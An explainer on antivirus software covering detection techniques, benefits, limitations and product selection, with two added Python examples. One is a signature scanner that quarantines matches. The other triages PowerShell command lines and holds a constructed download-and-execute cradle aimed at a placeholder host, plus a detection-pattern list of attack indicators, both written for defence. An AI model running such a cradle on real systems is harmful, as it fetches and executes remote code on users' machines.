What is antivirus software?

Antivirus software (also called an antivirus program) is a security program designed to prevent, detect and remove viruses and other types of malware from computers, networks and other devices. It is often bundled into a larger security package but can also be purchased as a standalone product.

Typically installed on endpoints as a proactive security control, an antivirus program helps mitigate a variety of threats, including keyloggers, browser hijackers, Trojan horses, worms, rootkits, spyware, adware, botnet agents, phishing attempts and ransomware.

Because new malware variants appear daily and zero-day attacks exploit flaws before any signature for them exists, no antivirus program can detect and block every threat. Antivirus is one layer of defense, not a complete one.

[Chart: some of the many types of malware that can harm a computer, network or server.] A virus is just one of the many types of malware that antivirus software is designed to prevent, detect and remove.

How antivirus software works

Antivirus software normally runs as a background process on computers, servers or mobile devices, scanning for malware and restricting its spread. Most products combine real-time (on-access) protection, which inspects files and programs as they are opened, downloaded or executed, with scheduled or on-demand scans that examine device and system files for known and suspected threats.

Antivirus software usually performs these basic functions:

  • Scans directories or specific files against a library of known malware signatures, flagging files that contain patterns characteristic of malicious software.
  • Lets users schedule scans so they run automatically.
  • Lets users start a new scan at any time.
  • Handles anything it detects, either automatically in the background, by quarantining or removing the file, or by notifying users of the infection and prompting them to clean it.
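The scan-and-quarantine loop described in the list above, as an added example (this is illustrative code, not the source of any antivirus product). The signature set, the sample files and the detection names Dropper.A and Beacon.C2 are constructed for the demo; a real engine loads vendor definition files and uses streaming multi-pattern matching, file-format parsers and unpacking rather than reading whole files. To exercise a real product's on-access scanner safely, use the industry-standard EICAR test file rather than live malware.

```python
"""Added example: a minimal on-demand signature scanner with quarantine.

Illustrative code, not from any antivirus product. The signature set, the
sample files and the detection names (Dropper.A, Beacon.C2) are all
constructed for the demo.
"""
import hashlib
import json
import shutil
import tempfile
import time
from pathlib import Path
from typing import Optional

# Constructed stand-ins for malicious content: inert bytes, not real malware.
DROPPER_SAMPLE = b"MZ" + b"\x90" * 16 + b"constructed stand-in for a known dropper"
BEACON_PATTERN = b"constructed-c2-beacon/1.0"

# A tiny "definition file": exact-file hashes plus characteristic byte patterns.
SIGNATURES = {
    "hashes": {hashlib.sha256(DROPPER_SAMPLE).hexdigest(): "Dropper.A"},
    "patterns": {BEACON_PATTERN: "Beacon.C2"},
}


def sha256_file(path: Path) -> str:
    """Hash in 64 KiB chunks so large files are never loaded whole."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def match_file(path: Path, sigs: dict) -> Optional[str]:
    """Return the detection name for a file, or None if nothing matched.

    A hash match is exact and cheap but breaks as soon as one byte changes;
    a pattern match survives small modifications as long as the
    characteristic string is still present.
    """
    digest = sha256_file(path)
    if digest in sigs["hashes"]:
        return sigs["hashes"][digest]
    data = path.read_bytes()  # whole-file read: fine for a demo, not for ISOs
    for pattern, name in sigs["patterns"].items():
        if pattern in data:
            return name
    return None


def quarantine(path: Path, detection: str, qdir: Path) -> Path:
    """Move a detected file into the quarantine directory.

    Moving rather than deleting keeps the evidence for analysis and lets a
    false positive be restored. The file is renamed with a .quar suffix so
    nothing launches it by its original name, made read-only, and given a
    JSON sidecar recording where it came from and why it was taken.
    """
    qdir.mkdir(mode=0o700, exist_ok=True)
    dest = qdir / f"{int(time.time() * 1000)}_{path.name}.quar"
    shutil.move(str(path), str(dest))
    dest.chmod(0o400)
    record = {"original": str(path), "detection": detection, "quarantined_at": time.time()}
    (qdir / (dest.name + ".json")).write_text(json.dumps(record, indent=2))
    return dest


def scan_tree(root: Path, sigs: dict, qdir: Path) -> list:
    """Walk root and return (original path, detection, quarantine path) tuples."""
    findings = []
    # Materialise the listing first: quarantine() moves files while we iterate.
    for p in sorted(root.rglob("*")):
        if not p.is_file() or qdir in p.parents:
            continue
        detection = match_file(p, sigs)
        if detection:
            findings.append((str(p), detection, str(quarantine(p, detection, qdir))))
    return findings


def demo() -> dict:
    """Build a throwaway tree with one clean and two 'infected' files, scan it."""
    root = Path(tempfile.mkdtemp(prefix="avdemo_"))
    qdir = root / "quarantine"
    (root / "notes.txt").write_bytes(b"quarterly numbers, nothing to see here")
    (root / "setup.bin").write_bytes(DROPPER_SAMPLE)  # exact-hash hit
    (root / "lib").mkdir()
    (root / "lib" / "update.dll").write_bytes(b"\x00" * 64 + BEACON_PATTERN + b"\x00" * 64)  # pattern hit
    findings = scan_tree(root, SIGNATURES, qdir)
    remaining = sorted(p.name for p in root.rglob("*") if p.is_file() and qdir not in p.parents)
    return {"findings": findings, "remaining": remaining}


if __name__ == "__main__":
    result = demo()
    for original, detection, dest in result["findings"]:
        print(f"{detection:<10} {original} -> {dest}")
    print("left untouched:", result["remaining"])
```

Running the module scans the temporary tree, quarantines setup.bin (hash hit) and lib/update.dll (pattern hit) and leaves notes.txt in place. The sidecar JSON is what lets a restore-from-quarantine feature put a false positive back where it was.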

To scan systems comprehensively, antivirus software needs privileged access to the entire system: it typically runs a kernel-mode file system filter driver and a service with administrative rights, and it parses untrusted input (every file on disk, every download) with that privilege. This makes antivirus software itself an attractive target, and researchers have found remote code execution and other serious vulnerabilities in antivirus products in recent years. Keeping the product itself patched matters as much as keeping its definitions current.

Benefits of antivirus software

The purpose of antivirus software is to defend a system against malware and the damage it does, providing real-time protection through automated scanning rather than waiting for a user to run a check.

Antivirus software provides several benefits:

  • Virus and malware protection. The main benefit of antivirus software is protection against malware such as viruses, spyware and ransomware. Most threats today are multipronged: a single infection can corrupt data, steal confidential information, spy on the user and degrade system performance at the same time. Having reliable antivirus software running at all times is therefore imperative.
  • Protection against spam and pop-ups. Malicious pop-up advertisements and spam-based webpages are common infection routes. Many antivirus suites include components that block pop-ups and spam originating from known malicious websites, so the user never reaches the malicious content in the first place.
  • Web protection. Antivirus software helps protect against the scam websites threat actors use to harvest credit card and bank details from unsuspecting users. By blocking access to known phishing and malware-hosting sites, a reliable antivirus program stops users from reaching them even if they click the link.
  • Real-time protection. Antivirus software acts as a real-time shield that scans each inbound file and program. Depending on its settings, an infected file or program is either deleted automatically or moved to a quarantine folder for further analysis. A quarantined file is stored in a form that can't be executed and is isolated from the rest of the machine and its programs, limiting the damage while preserving the sample for investigation or for restoring a false positive.
  • Boot-time scan. Some malware, such as rootkits, hides from scans while the OS is running, locks its own files or reinstalls itself from a second component when removed. A boot-time scan addresses this by scheduling a scan that runs on the next restart, before the full OS and its services are loaded. Because the malware is not yet active, its files can be inspected and removed before it has a chance to run or replicate.
  • Dark web monitoring. Data stolen in breaches, including ransomware incidents, is often leaked or sold on the dark web. Many antivirus suites include a monitoring service that checks for an organization's or user's sensitive data there. If an associated email address or account number turns up, the service notifies the user, who should then change the password for that account and enable multifactor authentication where available.
  • Protection from external devices. Most people regularly plug external devices, such as hard drives and USB sticks, into their computers. Antivirus software can scan removable media when it is attached and inspect files as they are copied from it, stopping malware that arrives through external sources.

Types of antivirus programs

Antivirus software is distributed in several forms: standalone antivirus scanners; machine learning and cloud-assisted engines; and internet security suites that bundle antivirus protection with firewalls, privacy controls and other security features. Popular providers of both free and commercial antivirus products include AVG Technologies, Kaspersky, Malwarebytes, McAfee, Norton and Trend Micro.

Some antivirus software vendors offer free basic versions of their products. These provide basic antivirus and spyware protection, but more advanced features and protections are usually available only to paying customers.

[Chart: four types of spyware.] Spyware is ubiquitous, unfortunately, and comes in several forms, including those shown here.

While some OSes are targeted more frequently by virus developers, antivirus software is available for most OSes:

  • Windows antivirus software. Most antivirus vendors offer several levels of Windows products at different price points, starting with free versions that provide only basic protection and often require users to run scans and updates manually. Free versions usually don't block links to malicious websites or malicious code and attachments in email. Premium versions often include suites of endpoint security tools that add secure online storage, ad blockers and file encryption. Microsoft's own protection started as an antispyware tool: Windows Defender, released in 2006 and built on the GIANT AntiSpyware product Microsoft acquired in late 2004, detected only spyware until it became a full antivirus engine with Windows 8 in 2012. Its successor, Microsoft Defender Antivirus, is built into Windows 10, Windows 11 and current versions of Windows Server, and can be managed centrally through Microsoft Defender for Endpoint and the Microsoft Defender portal.
  • MacOS antivirus software. Although macOS malware exists, it is less common than Windows malware, so antivirus products for Macs are less standardized than those for Windows. macOS also ships with its own built-in protections, including XProtect signature scanning and Gatekeeper checks on downloaded applications. Several free and paid third-party products add on-demand and real-time scanning, full-system malware scans and inspection of email attachments and web activity.
  • Android antivirus software. Android is the world's most popular mobile OS and is installed on more devices than any other OS. Because most mobile malware targets Android, experts recommend that Android users install antivirus software on their devices. Vendors offer free basic and paid premium versions, often including antitheft and remote-locating features; some run automatic scans and block malicious webpages and files from being opened or downloaded. Play Protect is Google's built-in malware protection for Android. It was introduced in 2017 and is delivered through Google Play services, so it is present on every device with Google Play services version 11 or newer.

Virus detection techniques

Antivirus software uses a variety of virus detection techniques. Six common types are:

  1. Signature-based detection. Antivirus programs depend on stored malware signatures -- byte sequences, hashes or other data characteristic of a known sample -- to flag malicious software. Because a signature exists only for malware that security researchers have already captured and analyzed, this method is precise but reactive.
  2. Heuristic-based detection. Rather than comparing a file against exact signatures, heuristic analysis looks for traits that malware tends to have: suspicious instruction sequences, self-modifying or packed code, unusual API imports, or code that acts maliciously when run in an emulator. This lets antivirus software catch malware that has not been cataloged yet, as well as known malware that has been obfuscated or modified to defeat its signature. The trade-off is false positives: a legitimate program that uses the same techniques (a packer, for example) can be misidentified as malicious.
  3. Behavior-based detection. Antivirus software can also use behavior-based detection to analyze an object's behavior or potential behavior for suspicious activities and infer malicious intent from those observations. For example, code that attempts unauthorized or abnormal actions is malicious or, at least, suspicious. Behaviors that potentially signal danger include modifying or deleting large numbers of files, monitoring keystrokes, changing the settings of other programs and opening unexpected network connections.
  4. Cloud analysis. According to Atlas VPN, more than 34 million new malware samples were discovered in 2025. No single endpoint can hold a complete definition set for that volume, so antivirus companies now offer cloud analysis as part of their products. When the local engine encounters an unknown or suspicious file, it sends the file (or its hash and metadata) to the vendor's servers, where it is analyzed. If it is confirmed to be malicious, a signature or reputation verdict is created and distributed, blocking the file on every other device where it appears, usually within minutes rather than at the next definition update.
  5. Sandbox analysis. This technique runs a program or file in an isolated virtual environment and observes its behavior before allowing it onto the real system; a file is released only if the sandbox analysis finds nothing malicious. It is also used for files the antivirus program can neither allowlist nor denylist with confidence. Because execution happens in isolation, a file that turns out to be malicious should not harm the host. Two caveats apply: sandboxes are software and can have escape vulnerabilities, and much malware checks for virtualization, delays its payload or waits for user interaction so that a short sandbox run looks clean.
  6. Host intrusion prevention system (HIPS). A HIPS monitors the actions of running programs against rules about what is allowed, such as writing to system directories, changing registry autostart entries or injecting code into other processes, rather than matching file content against signatures. When a rule fires, it can block the action or prompt the user with options such as Allow and Block.

Challenges facing antivirus software

According to Cybercrime Magazine, 90% of the world's population aged six and older will be connected to the internet by 2030. This rapid growth in internet connections expands the attack surface and drives the rise in malware and cyberattacks.

While antivirus programs were originally developed to combat viruses and cyberthreats, they do come with some limitations.

Here are current and future challenges of antivirus software:

  • Antivirus software that relies only on signature-based detection can't recognize new malware, including modified variants of existing families, until its definition file is updated with a signature for the new sample. With the number of new samples growing rapidly, antimalware based solely on signatures is impractical. Signature matching does have one advantage: it rarely produces false positives.
  • Even the best antivirus software sometimes misidentifies a benign program or file as malware, which can lead to a legitimate and important file or program being quarantined or deleted. Free antivirus options are typically more prone to false positives than paid services and don't usually provide enterprise-grade scanning and detection.
  • Antivirus software can interfere with system updates and software installations, blocking them outright or halting them partway through when the real-time scanner flags the installer's activity. The right fix is a vendor-documented exclusion for the update process, or pausing real-time scanning only for the duration of the install; disabling the firewall or the antivirus wholesale leaves the system unprotected precisely while it is unpatched.
  • Antivirus software runs quietly in the background, but it can consume significant system resources, including CPU, memory and disk I/O, slowing a device. Scanning network traffic can also add noticeable latency.
  • Antivirus software provides just one layer of protection. For comprehensive protection, organizations need a multilayered approach: hardware- and software-based firewalls, timely patching and backups, or a complete internet security suite that includes antivirus.

Ever-evolving technologies, including the metaverse, Web3, fintech and autonomous vehicles, make it harder to choose the right antivirus protection. With so many endpoints to secure, from crypto wallets to virtual reality devices, antivirus software can fall short. Most traditional, signature-based antivirus technologies also can't detect fileless attacks that run malicious code entirely in memory using trusted, already-installed tools such as PowerShell, Windows Management Instrumentation or Office macros: there is no new file on disk to scan. Catching these requires behavioral monitoring of process activity and command lines, plus script inspection hooks such as Microsoft's Antimalware Scan Interface (AMSI), which lets antivirus engines see script content after it has been de-obfuscated and just before it runs.
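One piece of the command-line inspection mentioned above, as an added example that is not code from any antivirus product: decoding a PowerShell -EncodedCommand payload (PowerShell base64-encodes UTF-16LE text for that switch) and collecting download-and-execute indicators from both the visible command line and the decoded script. The indicator list, the scoring and the two sample command lines are constructed for the demo; the host name example.invalid is a reserved name that resolves nowhere. The benign sample deliberately uses -NoProfile, a switch that administrators' scripts use routinely, to show why a single indicator is noise and only the combination is worth an alert.

```python
"""Added example: triaging a PowerShell command line for fileless-attack indicators.

Illustrative detection logic, not from any antivirus product. The indicator
table, the scoring and the sample command lines are constructed.
"""
import base64
import re
from typing import Optional

# Indicators commonly seen in download-and-execute one-liners. Matched
# case-insensitively because PowerShell is case-insensitive.
INDICATORS = {
    r"\bIEX\b|Invoke-Expression": "invoke-expression",
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b": "remote-download",
    r"FromBase64String": "base64-payload",
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass": "stealth-switches",
    r"Reflection\.Assembly|\[System\.Reflection": "in-memory-assembly-load",
}


def decode_encoded_command(argv: list) -> Optional[str]:
    """Return the decoded script if argv carries -EncodedCommand, else None.

    powershell.exe accepts any unambiguous prefix (-e, -en, -enc, ...) and the
    documented alias -ec, with either '-' or '/' as the switch character.
    """
    for i, tok in enumerate(argv[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        t = tok.lower().lstrip("-/")
        if t and ("encodedcommand".startswith(t) or t == "ec"):
            try:
                return base64.b64decode(argv[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # malformed payload: PowerShell would reject it too
    return None


def triage_command_line(cmdline: str) -> dict:
    """Decode any encoded payload and collect indicators from the whole thing."""
    argv = cmdline.split()
    decoded = decode_encoded_command(argv)
    text = cmdline + ("\n" + decoded if decoded else "")
    names = {name for pat, name in INDICATORS.items() if re.search(pat, text, re.IGNORECASE)}
    if decoded:
        names.add("encoded-command")
    return {"decoded": decoded, "indicators": sorted(names), "score": len(names)}


def constructed_samples() -> dict:
    """Two constructed command lines: a download cradle and an admin one-liner."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    enc = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
    return {
        "malicious": f"powershell.exe -nop -w hidden -enc {enc}",
        "benign": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"',
    }


if __name__ == "__main__":
    for label, line in constructed_samples().items():
        r = triage_command_line(line)
        print(f"{label}: score={r['score']} indicators={r['indicators']}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

The malicious sample scores four (encoded command, hidden window and no-profile switches, IEX, remote download), the benign one scores one. In practice the alert threshold and the decoded script are what a behavioral engine or an AMSI-backed scanner would pass on to the next detection stage.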

How to select antivirus software for an organization

Considering the many different antivirus products on the market, a careful selection process is recommended. Several important decision factors should be addressed before acquiring a product. Here are some of those considerations:

Reliability and compatibility

  • The program should not cause conflicts or malfunctions with other software apps.
  • The product should be compatible with existing OSes (e.g., Windows, macOS, Linux).
  • The product should be compatible with the devices to be protected (e.g., computers, smartphones, tablets).

Ease of use

  • Look for intuitive products that do not require special skills and training to operate properly.
  • There should be a user-friendly interface that facilitates easy access and feature configuration.

Features and level of protection

  • The program should deliver 24/7 protection against a broad range of malware (e.g., viruses, worms, Trojan horses).
  • Look for strong antimalware and ransomware detection features, along with resources that mitigate attacks when detected.

Maintenance

  • Regular definition updates and product patching keep antivirus software current against the latest threats, and against flaws in the product itself.
  • Technical support should be available to facilitate maintenance and deal with disruptions.

Protection approach

  • Protection should be continuous and accommodate scanning files and websites as they are accessed.
  • Consider products that include malware and ransomware detection.
  • Additional features of interest might include firewalls, parental controls and virtual private networks (VPNs).

Performance characteristics

  • Determine if the software will have a material impact on computer performance and resource usage (e.g., CPU and RAM).
  • Look for full, quick and custom on-demand scans alongside real-time (on-access) scanning, with scheduling and throttling options so scans can run without disrupting users.

Third-party assessments

  • Examine results of tests conducted by independent firms such as AV-TEST and AV-Comparatives for ratings of antivirus software.
  • User comments and reviews on antivirus software can be a helpful supplement to independent tests.

Financials and administrative issues

  • Select a product that offers the required features and protection that fits within technology budgets.
  • Consider open source and free products.
  • Pricing options can include one-time fixed prices, annual subscriptions or monthly fees.
  • Identify and weigh issues such as installation and testing, user training, access to a help desk, and availability of documentation.

Antivirus software vendors

Here is a brief list of antivirus product vendors:

  • Avast.
  • Avira.
  • Bitdefender.
  • ESET.
  • G Data Antivirus.
  • Kaspersky.
  • Malwarebytes.
  • McAfee.
  • Microsoft Defender.
  • Norton Antivirus.
  • Norton 360 Select with LifeLock.
  • Sophos.
  • Surfshark Antivirus.
  • Total AV Antivirus.
  • Trend Micro.
  • Webroot.

Consider all the selection criteria mentioned in this article when looking at a new installation or upgrading an existing product. Pilot the software in a test environment, checking for conflicts with existing applications and for false positives, before rolling it out to production systems.

While antivirus software can block certain ransomware before it runs, it can't undo the damage once ransomware has taken control of a system: removing the malware doesn't decrypt the files it has already encrypted. Recovery depends on tested, offline backups and a practiced incident response plan.
